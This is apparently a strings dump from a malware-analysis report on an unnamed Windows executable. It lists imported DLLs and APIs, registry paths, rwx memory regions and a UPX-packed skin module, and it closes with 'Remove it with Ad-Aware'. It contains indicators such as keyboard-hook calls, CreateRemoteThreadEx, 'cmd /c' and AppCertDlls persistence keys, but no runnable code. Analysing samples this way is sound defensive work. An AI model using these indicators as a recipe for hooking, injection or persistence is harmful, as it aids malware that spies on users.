fxsapi.dll
fwpuclnt.dll
fveapi.dll
fms.dll
firewallapi.dll
explorerframe.dll
evr.dll
esent.dll
elscore.dll
ehtrace.dll
efsutil.dll
efsadu.dll
eappcfg.dll
dxgi.dll
dwmapi.dll
duser.dll
dui70.dll
dsrole.dll
dsound.dll
drvstore.dll
drttransport.dll
drtprov.dll
drt.dll
dnsapi.dll
dhcpcsvc6.dll
dhcpcsvc.dll
dfscli.dll
devrtl.dll
devobj.dll
devmgr.dll
ddraw.dll
dbghelp.dll
dbgeng.dll
davhlpr.dll
d3d9.dll
d3d8.dll
d2d1.dll
cscdll.dll
cscapi.dll
cryptxml.dll
cryptui.dll
cryptsp.dll
cryptnet.dll
cryptdll.dll
cryptdlg.dll
cryptbase.dll
crypt32.dll
credui.dll
comsvcs.dll
comdlg32.dll
comctl32.dll
colbact.dll
clusapi.dll
clbcatq.dll
cfgmgr32.dll
certpoleng.dll
certenroll.dll
certcli.dll
catsrvut.dll
catsrv.dll
cabinet.dll
browcli.dll
bcrypt.dll
avrt.dll
authz.dll
appmgmts.dll
apphelp.dll
api-ms-win-service-winsvc-l1-1-0.dll
api-ms-win-service-management-l2-1-0.dll
api-ms-win-service-management-l1-1-0.dll
api-ms-win-service-core-l1-1-0.dll
api-ms-win-security-sddl-l1-1-0.dll
api-ms-win-security-lsalookup-l1-1-0.dll
advpack.dll
advapi32.dll
activeds.dll
actionqueue.dll
aclui.dll
SetProcessWindowStation
OpenWindowStationW
OpenWindowStationA
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
GetProcessWindowStation
GetKeyState
EnumDesktopWindows
CloseWindowStation
CM_Open_Class_Key_ExW
CM_MapCrToWin32Err
CM_MapCrToSpErr
uPFXImportCertStore
PFXExportCertStoreEx
PFXExportCertStore
CryptVerifyCertificateSignatureEx
CryptVerifyCertificateSignature
CryptSignCertificate
CryptSignAndEncodeCertificate
CryptMsgUpdate
CryptMsgOpenToEncode
CryptMsgOpenToDecode
CryptMsgGetParam
CryptMsgGetAndVerifySigner
CryptMsgControl
CryptMsgClose
CryptMsgCalculateEncodedLength
CryptImportPublicKeyInfoEx2
CryptImportPublicKeyInfoEx
CryptImportPublicKeyInfo
CryptHashPublicKeyInfo
CryptHashCertificate
CryptGetMessageCertificates
CryptExportPublicKeyInfo
CryptAcquireCertificatePrivateKey
CertVerifyValidityNesting
CertVerifyTimeValidity
CertVerifySubjectCertificateContext
CertStrToNameW
CertStrToNameA
CertSetEnhancedKeyUsage
CertSetCertificateContextProperty
CertSerializeCertificateStoreElement
CertSelectCertificateChains
CertSaveStore
CertRemoveEnhancedKeyUsageIdentifier
CertRegisterPhysicalStore
CertRDNValueToStrW
CertRDNValueToStrA
CertOpenSystemStoreW
CertOpenSystemStoreA
CertOpenStore
CertOIDToAlgId
CertNameToStrW
CertNameToStrA
CertIsRDNAttrsInCertificateName
CertGetSubjectCertificateFromStore
CertGetPublicKeyLength
CertGetNameStringW
CertGetIssuerCertificateFromStore
CertGetIntendedKeyUsage
CertGetEnhancedKeyUsage
CertGetCertificateContextProperty
CertGetCertificateChain
CertGetCTLContextProperty
CertFreeCertificateContext
CertFreeCertificateChainList
CertFreeCertificateChainEngine
CertFreeCertificateChain
CertFreeCTLContext
CertFreeCRLContext
CertFindSubjectInCTL
CertFindRDNAttr
CertFindExtension
CertFindChainInStore
CertFindCertificateInStore
CertFindCTLInStore
CertEnumCertificatesInStore
CertEnumCertificateContextProperties
CertEnumCRLsInStore
CertDuplicateStore
CertDuplicateCertificateContext
CertDuplicateCertificateChain
CertDuplicateCTLContext
CertDeleteCertificateFromStore
CertCreateSelfSignCertificate
CertCreateContext
CertCreateCertificateContext
CertCreateCTLContext
CertCreateCRLContext
CertControlStore
CertComparePublicKeyInfo
CertCompareIntegerBlob
CertCompareCertificateName
CertCompareCertificate
CertCloseStore
CertAddStoreToCollection
CertAddSerializedElementToStore
CertAddEnhancedKeyUsageIdentifier
CertAddEncodedCertificateToStore
CertAddEncodedCRLToStore
CertAddCertificateContextToStore
CertAddCRLContextToStore
CertVerifyCertificateChainPolicy
CryptHashSessionKey
CryptDuplicateKey
TF_RunInputCPL
TF_PostAllThreadMsg
SetupDiReportDeviceInstallError
SetupDiOpenDeviceInterfaceRegKey
SetupDiOpenDevRegKey
SetupDiOpenClassRegKeyExW
SetupDiOpenClassRegKeyExA
SetupDiOpenClassRegKey
SetupDiGetDevicePropertyKeys
SetupDiGetDeviceInterfacePropertyKeys
SetupDiGetClassPropertyKeysExW
SetupDiGetClassPropertyKeys
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiCreateDevRegKeyW
ShellExecuteW
ShellExecuteExW
ShellExecuteExA
ShellExecuteA
SHFileOperationW
SHFileOperationA
FindExecutableW
FindExecutableA
AssocGetDetailsOfPropKey
uSLUnregisterWindowsEvent
SLRegisterWindowsEvent
SLReArmWindows
SLIsWindowsGenuineLocal
SLGetWindowsInformationDWORD
SLGetWindowsInformation
SLConsumeWindowsRight
SetPortW
EnumPrinterKeyW
EnumPortsW
DeletePrinterKeyW
DeletePortW
ConfigurePortW
AddPortW
WTHelperGetProvCertFromChain
TrustIsCertificateSelfSigned
NetUnjoinDomain
NetJoinDomain
NetGetJoinInformation
LOAD: GETMODULEFILENAME failed PID=%ld | stringID=%ld | str=%S | flags=%d | hr = %X
j%Xjp3
SXS: %s() BasepSxsCreateStreams() failed
t.HH;
j.Yf;
PSSSSSSh
Invalid args passed
LOAD: INIT failed PID=%ld | stringID=%ld | str=%S | flags=%d | hr = %X
WTSShutdownSystem
twain_32.dll
SdbReleaseMatchingExe
SdbGetMatchingExe
SdbFindFirstGUIDIndexedTag
ApphelpCheckExe
j.Xf;
.data
UrlUnescapeW
UrlUnescapeA
UrlGetPartW
UrlEscapeW
UrlEscapeA
UrlCombineW
UrlCombineA
UrlCanonicalizeW
UrlCanonicalizeA
UrlApplySchemeW
UrlApplySchemeA
SHEnumKeyExW
SHDeleteKeyW
SHDeleteKeyA
PathIsURLW
PathCreateFromUrlW
uWS_HTTP2_INITIAL_CONNECTION__new
WS_HTTP2_CONNECTION__Initialize
I_RpcTransGetHttpCredentials
I_RpcTransFreeHttpCredentials
HttpSendIdentifyResponse
HTTP_TurnOnOffKeepAlives
HTTP_SyncSend
HTTP_SyncRecv
HTTP_SetLastBufferToFree
HTTP_ServerListen
HTTP_Send
HTTP_Recv
HTTP_QueryLocalAddress
HTTP_QueryClientIpAddress
HTTP_QueryClientId
HTTP_QueryClientAddress
HTTP_Open
HTTP_Initialize
HTTP_FreeResolverHint
HTTP_CopyResolverHint
HTTP_Close
HTTP_Abort
HTTP2WinHttpDirectSend
HTTP2WinHttpDirectReceive
HTTP2WinHttpDelayedReceive
HTTP2TimerReschedule
HTTP2TestHook
HTTP2SocketTransportChannel__SendComplete
HTTP2SocketTransportChannel__ReceiveComplete
HTTP2RecycleChannel
HTTP2ProcessRuntimePostedEvent
HTTP2ProcessComplexTSend
HTTP2ProcessComplexTReceive
HTTP2PlugChannelDirectSend
HTTP2IISSenderDirectSend
HTTP2IISDirectReceive
HTTP2GetRpcConnectionTransport
HTTP2FlowControlChannelDirectSend
HTTP2EpRecvFailed
HTTP2DirectReceive
HTTP2ContinueDrainChannel
HTTP2ChannelDataOriginatorDirectSend
HTTP2AbortConnection
FreeHttpTransportCredentials
DuplicateHttpTransportCredentials
ConvertToUnicodeHttpTransportCredentials
CompareHttpTransportCredentials
TransportAddrFromMtxAddr
MtxAddrFromTransportAddr
DsaExeStartRoutine
DirOperationControl
DSStrToHashKeyExternal
DSNAMEToHashKeyExternal
AttrTypeToKey
SaferiIsExecutableFileType
ReportEventW
ReportEventA
RegUnLoadKeyW
RegSetKeyValueW
RegSetKeySecurity
RegSaveKeyW
RegSaveKeyExW
RegSaveKeyA
RegRestoreKeyW
RegReplaceKeyW
RegRenameKey
RegQueryReflectionKey
RegQueryInfoKeyW
RegQueryInfoKeyA
RegOpenKeyW
RegOpenKeyTransactedW
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyA
RegNotifyChangeKeyValue
RegLoadKeyW
RegGetKeySecurity
RegFlushKey
RegEnumKeyW
RegEnumKeyExW
RegEnumKeyA
RegEnableReflectionKey
RegDisableReflectionKey
RegDeleteKeyW
RegDeleteKeyValueW
RegDeleteKeyTransactedW
RegDeleteKeyExW
RegDeleteKeyExA
RegDeleteKeyA
RegCreateKeyW
RegCreateKeyTransactedW
RegCreateKeyExW
RegCreateKeyA
RegCloseKey
GetServiceKeyNameW
GetEventLogInformation
FreeEncryptionCertificateHashList
FreeEncryptedFileKeyInfo
EncryptedFileKeyInfo
ElfReportEventW
Gentee.Installer
RR.Raphael.Install.Builder
ThraexSoftware.AstrumInstallWizard
Roshal.WinRAR.WinRAR
Illustrate.Spoon.Installer
InstallShield.Setup
Nullsoft.NSIS
JR.Inno.Setup
uOSSh
\twain_32.dll
TermsrvSetKeySecurity
TermsrvRestoreKey
TermsrvDeleteKey
TermsrvSetValueKey
tsappcmp.dll
SXS: %s() empty lpSource %ls
SXS: %s() Calling csrss server failed. Status = 0x%x
SXS: %s() NtCreateSection() failed. Status = 0x%x.
SXS: %s() NtMapViewOfSection failed
SXS: %s() NtOpenFile(%wZ) failed
SXS: %s() AssemblyDirectory is not null terminated
SXS: %s() BaseDllMapResourceIdW failed
SXS: %s() ACTCTX_FLAG_RESOURCE_NAME_VALID set but lpResourceName == 0
SXS: %s() Bad lpAssemblyDirectory %ls
SXS: %s() Bad lpApplication name '%ls'
SXS: %s() Bad lpSource PathType %ls, 0x%lx
SXS: %s() bad wProcessorArchitecture 0x%x
SXS: %s() BaseDllMapResourceIdA failed
SXS: Invalid parameter(s) passed to FindActCtxSection*()
->cbSize = %u
SXS: %s() CsrCaptureMessageMultiUnicodeStringsInPlace failed
Kernel32: No mapping for ImageInformation.Machine == x
ConnectConsoleInternal failed with Status 0x%x
NtConnectPort %ws failed with Status 0x%x
SXS: %s() NtQueryInformationFile failed. Status = 0x%x
WaitForMultipleObjects returned with %d
RtlWerpReportException failed with status code :%d. Will try to launch the process directly
WerpReportFault Invalid params passed
WerpHeapFree failed with 0x%x
Too long restart command line passed
t5SSh
StringCchCopy failed with 0x%x
Invalid arg in %s
Invalid block passed
INIT: PID %ld is %S
LOAD: INS failed PID=%ld | stringID=%ld | str=%S | flags=%d | hr = %X
TermsrvLogInstallIniFile
TermsrvGetWindowsDirectoryW
TermsrvGetWindowsDirectoryA
SXS: %s() NtCreateSection() failed. Status = 0x%x
SXS: %s() Null %p or size 0x%lx too small
SXS: %s() Bad flags/size 0x%lx/0x%lx
.debug
.reloc
.rsrc1
.rsrc
SXS: %s() NtOpenFile(%wZ) failed. Status = 0x%x
Invalid args in %s
WerpGetRecoveryInfoForSelf failed with 0x%x
SSSSh
WPSSh
mem16.dll
ImpersonateNamedPipeClient
PSSh?
PWVSSh
{u.j-Yf9H&uùH0u
u%SPd
t SSh
PSSh<
SXS: %s - Failure getting active activation context; ntstatus lx
PVWSSh
VSSHP
GetSystemWindowsDirectory failed or the size was not adequate
StringCchPrintf failed with 0x%x
NtQueryInformationProcess failed with 0x%x
Failed to create the process %S
Failed to get the paths for the crash vertical. Error was 0x%x
NtQueryInformationProcess failed with status: 0x%x
uRtlInitUnicodeStringEx returned 0x%x
NtQueryInformationProcess failed 0x%x
uStringcchcopy failed while copying the debugger path 0x%x
StringCchPrintf failed while printng the debugger commandline with 0x%x
StringCchPrintf failed while printing the debugger path with 0x%x
NtWow64QueryInformationProcess64 failed with 0x%x
NtWow64ReadVirtualMemory64 failed with 0x%x
NtQueryInformationProcess failed with status 0x%x
WerpNtWow64QueryInformationProcess64 failed with status 0x%x
Invalid handle passed
USE: GETMODSTAMP failed PID=%ld | MODNAME=%S | STRID=%ld | hr = %X
USE: GETMODULEVERSION failed PID=%ld | MODNAME=%S | STRID=%ld | hr = %X
USE: Lookup failed PID=%ld | STR=%S | HashModBuckets=%ld
CACHE: Purging node from the cache MOD=%s | STRID=%ld | Flags=%X | HashModBuckets=%ld
KERNEL32.dll
BaseCleanupAppcompatCacheSupport
BaseInitAppcompatCacheSupport
CallNamedPipeA
CallNamedPipeW
CmdBatNotification
ConnectNamedPipe
CreateIoCompletionPort
CreateMutexExA
CreateMutexExW
CreateNamedPipeA
CreateNamedPipeW
CreatePipe
DisconnectNamedPipe
EnumCalendarInfoExEx
EnumDateFormatsExEx
GetCPInfo
GetCPInfoExA
GetCPInfoExW
GetCalendarSupportedDateRange
GetConsoleAliasExesA
GetConsoleAliasExesLengthA
GetConsoleAliasExesLengthW
GetConsoleAliasExesW
GetConsoleInputExeNameA
GetConsoleInputExeNameW
GetConsoleKeyboardLayoutNameA
GetConsoleKeyboardLayoutNameW
GetConsoleOutputCP
GetLargestConsoleWindowSize
GetNamedPipeAttribute
GetNamedPipeClientComputerNameA
GetNamedPipeClientComputerNameW
GetNamedPipeClientProcessId
GetNamedPipeClientSessionId
GetNamedPipeHandleStateA
GetNamedPipeHandleStateW
GetNamedPipeInfo
GetNamedPipeServerProcessId
GetNamedPipeServerSessionId
GetProcessHandleCount
GetProcessHeap
GetProcessHeaps
GetProcessShutdownParameters
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryW
InitOnceExecuteOnce
NeedCurrentDirectoryForExePathA
NeedCurrentDirectoryForExePathW
PeekNamedPipe
RegCreateKeyExA
RegEnumKeyExA
RegLoadKeyA
RegRestoreKeyA
RegSaveKeyExA
RegUnLoadKeyA
RegisterWowExec
SetConsoleInputExeNameA
SetConsoleInputExeNameW
SetConsoleKeyShortcuts
SetConsoleMaximumWindowSize
SetConsoleOutputCP
SetNamedPipeAttribute
SetNamedPipeHandleState
SetProcessShutdownParameters
SetThreadExecutionState
TransactNamedPipe
VDMConsoleOperation
VDMOperationStarted
WaitNamedPipeA
WaitNamedPipeW
WinExec
NTDLL.RtlAcquireSRWLockExclusive
NTDLL.RtlAcquireSRWLockShared
api-ms-win-core-libraryloader-l1-1-0.AddDllDirectory
NTDLL.RtlAddVectoredContinueHandler
NTDLL.RtlAddVectoredExceptionHandler
NTDLL.TpCancelAsyncIoOperation
NTDLL.TpReleasePool
NTDLL.TpReleaseCleanupGroup
NTDLL.TpReleaseCleanupGroupMembers
NTDLL.TpReleaseIoCompletion
NTDLL.TpReleaseTimer
NTDLL.TpReleaseWait
NTDLL.TpReleaseWork
api-ms-win-core-processthreads-l1-1-0.CreateRemoteThreadEx
NTDLL.RtlDecodePointer
NTDLL.RtlDecodeSystemPointer
NTDLL.RtlDeleteBoundaryDescriptor
NTDLL.RtlDeleteCriticalSection
api-ms-win-core-processthreads-l1-1-0.DeleteProcThreadAttributeList
NTDLL.TpDisassociateCallback
NTDLL.RtlEncodePointer
NTDLL.RtlEncodeSystemPointer
NTDLL.RtlEnterCriticalSection
NTDLL.RtlExitUserThread
NTDLL.NtFlushProcessWriteBuffers
NTDLL.TpCallbackUnloadDllOnCompletion
NTDLL.RtlGetCurrentProcessorNumber
NTDLL.RtlGetCurrentProcessorNumberEx
api-ms-win-core-sysinfo-l1-1-0.GetLogicalProcessorInformationEx
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
NTDLL.RtlSizeHeap
NTDLL.RtlRunOnceInitialize
NTDLL.RtlInitializeConditionVariable
NTDLL.RtlInitializeCriticalSection
api-ms-win-core-processthreads-l1-1-0.InitializeProcThreadAttributeList
NTDLL.RtlInitializeSListHead
NTDLL.RtlInitializeSRWLock
NTDLL.RtlInterlockedCompareExchange64
NTDLL.RtlInterlockedFlushSList
NTDLL.RtlInterlockedPopEntrySList
NTDLL.RtlInterlockedPushEntrySList
NTDLL.RtlInterlockedPushListSList
NTDLL.TpIsTimerSet
NTDLL.RtlLeaveCriticalSection
NTDLL.TpCallbackLeaveCriticalSectionOnCompletion
api-ms-win-core-processthreads-l1-1-0.OpenProcessToken
api-ms-win-core-processthreads-l1-1-0.OpenThreadToken
NTDLL.RtlQueryDepthSList
NTDLL.TpCallbackReleaseMutexOnCompletion
NTDLL.RtlReleaseSRWLockExclusive
NTDLL.RtlReleaseSRWLockShared
NTDLL.TpCallbackReleaseSemaphoreOnCompletion
api-ms-win-core-libraryloader-l1-1-0.RemoveDllDirectory
NTDLL.RtlRemoveVectoredContinueHandler
NTDLL.RtlRemoveVectoredExceptionHandler
NTDLL.RtlRestoreLastWin32Error
NTDLL.RtlMoveMemory
NTDLL.RtlZeroMemory
NTDLL.RtlSetCriticalSectionSpinCount
api-ms-win-core-libraryloader-l1-1-0.SetDefaultDllDirectories
NTDLL.TpCallbackSetEventOnCompletion
api-ms-win-core-processthreads-l1-1-0.SetThreadToken
NTDLL.TpSetPoolMaxThreads
NTDLL.TpSetTimer
NTDLL.TpSetWait
api-ms-win-core-threadpool-l1-1-0.SetWaitableTimerEx
NTDLL.TpStartAsyncIoOperation
NTDLL.TpPostWork
NTDLL.RtlTryAcquireSRWLockExclusive
NTDLL.RtlTryAcquireSRWLockShared
NTDLL.RtlTryEnterCriticalSection
api-ms-win-core-processthreads-l1-1-0.UpdateProcThreadAttribute
NTDLL.VerSetConditionMask
NTDLL.TpWaitForIoCompletion
NTDLL.TpWaitForTimer
NTDLL.TpWaitForWait
NTDLL.TpWaitForWork
NTDLL.RtlWakeAllConditionVariable
NTDLL.RtlWakeConditionVariable
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-Win-Core-Profile-L1-1-0.dll
API-MS-Win-Core-Util-L1-1-0.dll
API-MS-Win-Core-Fibers-L1-1-0.dll
API-MS-Win-Core-ErrorHandling-L1-1-0.dll
API-MS-Win-Core-Debug-L1-1-0.dll
API-MS-Win-Core-String-L1-1-0.dll
API-MS-Win-Core-ProcessEnvironment-L1-1-0.dll
API-MS-Win-Core-Localization-L1-1-0.dll
API-MS-Win-Core-SysInfo-L1-1-0.dll
API-MS-Win-Core-Misc-L1-1-0.dll
API-MS-Win-Core-NamedPipe-L1-1-0.dll
API-MS-Win-Core-LibraryLoader-L1-1-0.dll
API-MS-Win-Core-ThreadPool-L1-1-0.dll
API-MS-Win-Core-IO-L1-1-0.dll
API-MS-Win-Core-File-L1-1-0.dll
API-MS-Win-Core-Synch-L1-1-0.dll
API-MS-Win-Core-Handle-L1-1-0.dll
API-MS-Win-Core-Memory-L1-1-0.dll
API-MS-Win-Core-Heap-L1-1-0.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNELBASE.dll
ntdll.dll
API-MS-Win-Core-RtlSupport-L1-1-0.dll
NtNotifyChangeKey
RtlComputeImportTableHash
RtlRunOnceExecuteOnce
NtSetThreadExecutionState
LdrQueryImageFileExecutionOptions
NtCreateKeyTransacted
NtDeleteValueKey
NtEnumerateKey
RtlFormatCurrentUserKeyPath
NtEnumerateValueKey
NtCreateKey
NtSetValueKey
NtFlushKey
NtOpenKey
NtQueryValueKey
LdrQueryImageFileKeyOption
NtYieldExecution
NtRequestWaitReplyPort
NtConnectPort
NtOpenKeyTransacted
NtQueryKey
NtOpenKeyEx
NtOpenKeyTransactedEx
NtDeleteKey
NtLoadKey
NtUnloadKey
NtNotifyChangeMultipleKeys
NtRestoreKey
NtSaveKeyEx
RtlWerpReportException
WerReportSQMEvent
BaseGetProcessExePath
OpenRegKey
GetCPHashNode
BaseReleaseProcessExePath
kernel32.pdb
; ;$;(;,;0;4;
> >$>(>,>
4 4$4(4,4044484
6 6$6(6,60646
0 0$0(0,00040
8 8$8(8,8
? ?$?(?,?0?4?8?
< <$<(<,<0<4<
094989<9
; ;$;(;,;0;4;8;<;
7 7$7(7,70747
=,>0><>|>
<,>0>8><>
121c1/2`2
:":\:&;>;};
6 7$7(7,7074787<7@7
01
2$2*2/2?2
cmd /c
\Registry\Machine\Software\Policies\Microsoft\Windows\System
win.ini
.Manifest
.Config
\Registry\Machine\Software\Microsoft\Windows\Windows Error Reporting\WMR
\Windows
hotkey.
Software\Microsoft\Windows NT\CurrentVersion\Windows
sortdefault.nls
\Registry\MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
windows seven
windows vista
\Software\Microsoft\Windows NT\CurrentVersion
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls
\Registry\MACHINE\Software\Policies\Microsoft\Windows\AppCompat
\system32\apphelp.dll
InstallShield Self-extracting EXE
Autoextractor EXE de InstallShield
hrbares Programm EXE
PackageForTheWeb
PackageForTheWeb Fehler
PackageForTheWeb Error
Setup cannot start the program _Setup.exe
Setup couldn't decompress the file '%s'.
\\.\MountPointManager
\\?\UNC\
ADVAPI32.DLL
\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
pNullsoft.NSIS
.Local
~RF%4x.TMP
hotkey.%u %s
wowexec.pif
EmbdTrst.DLL
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
csrstub.exe %d -P %ws
WINDOWS
hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings
Application.Manifest
\\?\GLOBALROOT
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\wmrtrace.dmp
DNSAPI.DLL
"/\[]:|<> =;,?
\Registry\Machine\System\CurrentControlSet\Services\Tcpip\Parameters
\REGISTRY\USER\.DEFAULT
AppCertDlls
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected\AutoExclusionList
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\AutoExclusionList
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
pwinmail.exe
wmplayer.exe
outlook.exe
explorer.exe
iexplore.exe
ntsd.exe
cdb.exe
windbg.exe
PendingFileRenameOperations%d
PendingFileRenameOperations
%ws%u\DosDevices\%ws
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Compatibility\Applications\
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
serialui.dll
"%s\ntvdm.exe" %s%c
"%s\ntvdm.exe" -i%lx %s%c
\KernelObjects\SystemErrorPortReady
%systemroot%\system32\ntdll.dll
\\.\PhysicalDrive%lu
%s -u -p %d -s %I64d
%s\%s
WerFault.exe
WerFaultSecure.exe
%s\system32\%s
sntdll.dll
\Software\Microsoft\Windows\Windows Error Reporting\WMR
!"#$%&'()* ,
Windows NT BASE API Client DLL
6.1.7601.17651 (win7sp1_gdr.110715-1504)
Windows
Operating System
6.1.7601.17651

%original file name%.exe_2060_rwx_028D0000_000CA000:

.nlu2nlu
tSSSh
=.cmd
=.pif
=.lnk
=.com
=.bat
6SSSSh
USER32.dll
ActivateKeyboardLayout
ArrangeIconicWindows
CallMsgFilter
CallMsgFilterA
CallMsgFilterW
CascadeChildWindows
CascadeWindows
CliImmSetHotKey
CloseWindowStation
CreateDialogIndirectParamA
CreateDialogIndirectParamAorW
CreateDialogIndirectParamW
CreateWindowStationA
CreateWindowStationW
DisableProcessWindowsGhosting
DisplayExitWindowsWarnings
EnumChildWindows
EnumDesktopWindows
EnumThreadWindows
EnumWindowStationsA
EnumWindowStationsW
EnumWindows
ExitWindowsEx
GetAsyncKeyState
GetKeyNameTextA
GetKeyNameTextW
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
GetKeyboardState
GetKeyboardType
GetProcessWindowStation
LoadKeyboardLayoutA
LoadKeyboardLayoutEx
LoadKeyboardLayoutW
LockWindowStation
MapVirtualKeyA
MapVirtualKeyExA
MapVirtualKeyExW
MapVirtualKeyW
MsgWaitForMultipleObjects
MsgWaitForMultipleObjectsEx
OemKeyScan
OpenWindowStationA
OpenWindowStationW
RegisterErrorReportingDialog
RegisterHotKey
RegisterSessionPort
SetKeyboardState
SetProcessWindowStation
SetWindowStationUser
SetWindowsHookA
SetWindowsHookExA
SetWindowsHookExW
SetWindowsHookW
SfmDxReportPendingBindingsToDwm
TileChildWindows
TileWindows
UnhookWindowsHook
UnhookWindowsHookEx
UnloadKeyboardLayout
UnlockWindowStation
UnregisterHotKey
UnregisterSessionPort
VkKeyScanA
VkKeyScanExA
VkKeyScanExW
VkKeyScanW
WINNLSGetIMEHotkey
keybd_event
luC.ju
CtfImmGetCompatibleKeyboardLayout
CtfImmSetDefaultRemoteKeyboardLayout
ImmProcessKey
nuSSSSh
tcPPWS
PSShTKlu
PSSh0Klu
F\ FTP
~,SSSh
*9]0t#SShH\hu
t(SShW
PSShH
tWSh&.nu
ADVAPI32.dll
CFGMGR32.dll
MSIMG32.dll
POWRPROF.dll
WINSTA.dll
ReportEventW
CM_MapCrToWin32Err
KERNEL32.dll
GDI32.dll
ntdll.dll
RtlCheckRegistryKey
NtYieldExecution
NtCreateKey
NtSetValueKey
NtDeleteValueKey
NtEnumerateKey
NtOpenKey
NtQueryValueKey
GetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GetCPInfo
GetSystemWindowsDirectoryW
RegOpenKeyExW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegDeleteKeyExW
user32.pdb
windows.hlp
n..GGHHH
n...GGHHH
n ....HGHHHH
n  ....G.HHH
~~~~{~{{{{
n!! ....HGHHHH
n!!  .....HHHHHH
!!!  ....GGHHH
!!"".....HHHHnv
"""...-.nv
%DvttxxxxxxxxxxkL
&)-.CFDA86ANXYYUUUNna
$ .CC|
**$**$*$)0
' "$ $ *$'
8==???//3
9@==??<42
,446666,,$
"", ,',"!
jjk%xxy
jjk`jjk%xxy
>7;?__?;7>
%D=9;
.AG ,,H,a
 $ $ $$ $*$'%
.)***'***
FK;% %Sbd#
\;0-0----1--1-//1?7|
=:640)0#
=7:4##)4#
=:440)0)##
7440)))4#"
?<:4404)40##"!!
7:4)44)))#""!!
=<:744744))#""!!
=<47474744))""!!!
=<747474444)#""!!
=<<4777747)4#""
<7<77774444)"""
<77774 444###"""!!!
<<<: 44##"""
<<4 4###"
<<: 4##"
")355886''
.ziw ~y
@@@{9998
wtUUeUQ3"%U
wwtUUUe@B%UU
4W5X5
6B8N8T8‘9S9b9h9
88W8^8q8
<&<,<6<<<
0 5&53595e6
3,343^3~3
csrsrv.dll
\Registry\Machine\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3
\Registry\Machine\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3
kbdus.dll
Keyboard Layout\Preload
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layouts\
Control Panel\Input Method\Hot Keys
Virtual Key
Key Modifiers
keyboardlayout.ini
imm32.dll
Software\Policies\Microsoft\Windows NT\Reliability
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Windows
\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Media Center\
\Registry\Machine\Software\Microsoft\Windows\Tablet PC\
POWRPROF.DLL
\Windows\WindowStations
\Windows
IMM32.DLL
&%d %ws
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layout\
IgnoreRemoteKeyboardLayout
Keyboard Layout
kbdkor.dll
kbdjpn.dll
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layout
\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3
Hot Keys
00000409
\winhlp32.exe
x:\...\
OLE32.DLL
%SystemRoot%\System32\user32.dll
%s\%d
Software\Microsoft\Windows\CurrentVersion\Reliability
hh.exe
indicdll.dll
Multi-User Windows USER API Client DLL
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows
Operating System
6.1.7601.17514

%original file name%.exe_2060_rwx_02FD8000_0000C000:

x.yvr
x.yvkd
x.yvw
x.yvq5v
1iu2.iu

%original file name%.exe_2060_rwx_0306D000_000CA000:

version.dll
user32.dll
shell32.dll
1e.ro4A
oleaut32.dll
H0.gW
comctl32.dll
advapi32.dll
gdi32.dll
d.jF/"
r#'%C
6.Xdp
g|$^.Cn
>.bM8
>Z.Ye
w4R`$p%s*
f.zo~L^
wsock32.dll
ntdll.dll
Ë.L@
l.sQ{
c-t{.FF
b#I".wM
e.ENZ
xip.tu
@>.vO
%FX2Fsi
qKT.jLka
3.LD7
Uq
G,.gd
<.cFF=j
&8.XMj
$~O.Ba
)].Wd
/_{M%U
Q%s6|
lVfeVg
 !%uO
mh.ud
m%Csn%
kq84.QaI
)f%fg
.SuDYw
K)`p.frC
*%s!%
aR.dDb&<y
.xk 4g
ShellExecuteA
RegCloseKey
)%S{.
'U}.Ue
l%S(8x$!(
1L%UJ
.vtbw
.iA5N
yyhKa%S
d.Zd=#R
x0r%F{
.IPi)
Vj.jH
>M%X9
/8[<{~@ 
bc.lTk
ks_GetMsg
kssPlugin.dll
tole32.dll
kernel32.dll

%original file name%.exe_2060_rwx_10000000_0003E000:

`.rsrc
L$(h%f
SSh0j
hu2.iu
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll


Remove it with Ad-Aware

